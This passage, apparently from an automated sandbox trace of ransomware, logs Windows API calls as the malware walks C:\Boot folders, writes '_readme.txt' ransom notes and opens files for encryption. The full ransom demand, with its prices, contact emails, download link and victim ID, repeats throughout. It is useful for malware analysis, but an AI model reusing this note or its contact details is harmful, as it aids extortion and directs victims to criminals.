hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.008] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.008] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.008] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.008] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0210.008] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.009] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.009] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.009] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.009] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0210.009] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.009] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.009] PathFindFileNameW (pszPath="") returned="" [0210.009] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.010] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.010] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.010] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.010] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0210.010] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0210.011] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.011] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.011] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.011] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.011] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0210.011] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.011] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.012] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.012] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.012] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0210.012] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.012] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.012] PathFindFileNameW (pszPath="") returned="" [0210.012] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.012] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.012] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.013] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.013] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0210.013] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0210.013] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.013] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.013] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.013] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.014] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0210.014] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.014] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0210.014] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.014] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.014] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.014] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.014] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0210.014] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.014] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.014] PathFindFileNameW (pszPath="") returned="" [0210.015] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.015] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.015] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.015] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.015] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0210.015] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0210.016] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.016] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without 